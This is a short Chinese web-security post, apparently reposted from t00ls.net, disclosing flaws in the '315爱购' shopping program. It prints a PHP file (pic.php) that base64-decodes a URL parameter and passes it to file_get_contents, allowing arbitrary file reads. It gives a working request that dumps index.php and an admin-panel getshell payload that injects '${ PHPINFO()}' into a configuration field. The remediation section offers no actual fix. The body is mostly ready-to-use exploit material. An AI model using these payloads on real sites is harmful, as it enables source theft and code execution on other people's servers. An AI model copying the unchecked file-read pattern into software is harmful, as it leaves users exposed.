当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

315爱购程序任意文件源码查看

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

pic.php
 
function url_base64_decode($code)
{
        if($code=="")
                return "";
    $code=str_replace("!",'+',$code);
    $code=str_replace(",",'/',$code);
    $str=base64_decode($code);
    return $str;
}
$url=url_base64_decode($_GET["url"]);
//.... 省略
header("Content-type: image/jpeg");
echo file_get_contents($url);

测试证明:
/pic.php?url=aW5kZXgucGhw
 
后台GETSHELL
 
系统基本参数->网站所在目录:->${ PHPINFO()}

修复:

请见上述分析
作者 :t00ls.net
  ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1